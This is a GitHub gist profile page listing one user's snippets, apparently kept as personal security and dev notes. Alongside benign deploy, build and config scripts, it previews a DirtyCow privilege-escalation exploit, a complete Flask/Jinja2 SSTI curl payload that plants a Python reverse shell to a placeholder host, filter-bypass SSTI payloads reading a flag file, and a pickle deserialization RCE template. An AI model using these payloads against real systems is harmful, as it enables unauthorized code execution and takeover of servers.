Skip to content

Instantly share code, notes, and snippets.

View zema1's full-sized avatar
💭
I may be slow to respond.

koalr zema1

💭
I may be slow to respond.
1.2k followers · 178 following
View GitHub Profile
@zema1
zema1 / post-receive.sh
Created November 21, 2016 07:43 — forked from icyleaf/post-receive.sh
git autodeploy script when it matches the string "[deploy]"
#!/bin/sh
#
# git autodeploy script when it matches the string "[deploy]"
#
# @author icyleaf <icyleaf.cn@gmail.com>
# @link http://icyleaf.com
# @version 0.1
#
# Usage:
# 1. put this into the post-receive hook file itself below
@zema1
zema1 / golang-cross-compiling.sh
Last active March 14, 2018 01:52
golang-cross-compiling.sh
#!/usr/bin/env bash
# https://www.digitalocean.com/community/tutorials/how-to-build-go-executables-for-multiple-platforms-on-ubuntu-16-04
package=$1
if [[ -z "$package" ]]; then
echo "usage: $0 <package-name>"
exit 1
fi
package_split=(${package//\// })
@zema1
zema1 / c0w.c
Created April 9, 2018 05:31 — forked from KrE80r/c0w.c
PTRACE_POKEDATA variant of CVE-2016-5195
/*
* A PTRACE_POKEDATA variant of CVE-2016-5195
* should work on RHEL 5 & 6
*
* (un)comment correct payload (x86 or x64)!
* $ gcc -pthread c0w.c -o c0w
* $ ./c0w
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* mmap fa65a000
@zema1
zema1 / flask_ssti_rce.sh
Last active July 20, 2018 05:55
Flash SSTI RCE
curl 'localhost:8088/?next={{request.__class__.__mro__[8].__subclasses__()[40](request.headers[request.headers.keys()[6]],request.headers[request.headers.keys()[6]][5]).write(request.headers[request.headers.keys()[4]])}}{{config.from_pyfile(request.headers[request.headers.keys()[6]])}}' -g -H "x-f: /tmp/w" -H 'x-p: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("REVERSE_SHELL_IP",REVERSE_SHELL_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
when filter __class__, __subclasses__
{% raw %}{{[].__getattribute__('__cla'+'ss__').__base__.__getattribute__([].__getattribute__('__cla'+'ss__').__base__,'__subclas'+'ses__')()[40]('/opt/flag_b420e8cfb8862548e68459ae1d37a1d5.txt','r').__getattribute__('r'+'ead')()}} {% endraw %}
and more filter https://0day.work/jinja2-template-injection-filter-bypasses/
http://localhost:5000/?exploit={%set%20a,b,c,d,e,f,g,h,i%20=%20request|attr((request.args.usc*2,request.args.
@zema1
zema1 / jwt_base64_url.py
Last active July 20, 2018 06:47
simple jwt token encode and decode
```
def base64_url_encode(text):
return base64.b64encode(text).replace('+', '-').replace('/', '_').replace('=', '')
def base64_url_decode(text):
text = text.replace('-', '+').replace('_', '/')
while True:
try:
result = base64.b64decode(text)
@zema1
zema1 / pickle-payload.py
Created August 1, 2018 10:07 — forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import os
import sys
@zema1
zema1 / enable_aptx_aac_macos.sh
Last active September 1, 2020 14:47 — forked from marnovo/enable_aptx_aac_macos.sh
Enable AptX and AAC codecs on macOS
# (c) 2018 Marcelo Novaes
# License - MIT
# Enable AptX and AAC codecs on bluetooth connections on macOS
sudo defaults write bluetoothaudiod "Enable AptX codec" -bool true
sudo defaults write bluetoothaudiod "Enable AAC code" -bool true
# default is 128, you can change to higher
sudo defaults write bluetoothaudiod "AAC Bitrate" 128
@zema1
zema1 / async_pool_run_with_stats.py
Created December 29, 2019 11:16
import asyncio
import functools
import random
from multiprocessing import Manager
from aiomultiprocess import Pool
from aiomultiprocess.types import Queue
async def work(q: Queue, sleep_time: int):